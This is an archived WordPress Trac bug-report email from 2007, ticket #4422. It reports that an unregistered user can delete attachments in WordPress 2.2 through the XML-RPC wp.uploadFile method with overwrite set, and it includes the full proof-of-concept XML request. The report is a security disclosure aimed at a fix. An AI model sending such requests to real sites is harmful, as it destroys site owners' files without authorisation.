[wp-trac] [WordPress Trac] #4422: Anyone can delete attachments
WordPress Trac
wp-trac at lists.automattic.com
Fri Jun 8 14:48:18 GMT 2007
#4422: Anyone can delete attachments
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.2.2
Component: Security | Version: 2.2
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
An unregistered user can delete attachments through xmlrpc request:
{{{
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value>1</value></param>
<param><value>1</value></param>
<param><value>1</value></param>
<struct>
<member><name>name</name><value>attachement_name</value></member>
<member><name>overwrite</name><value>1</value></member>
</struct>
</params>
</methodCall>
}}}
I'll submit a partial fix -- I think that an user should only delete their
own uploaded files.
--
Ticket URL: <http://trac.wordpress.org/ticket/4422>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list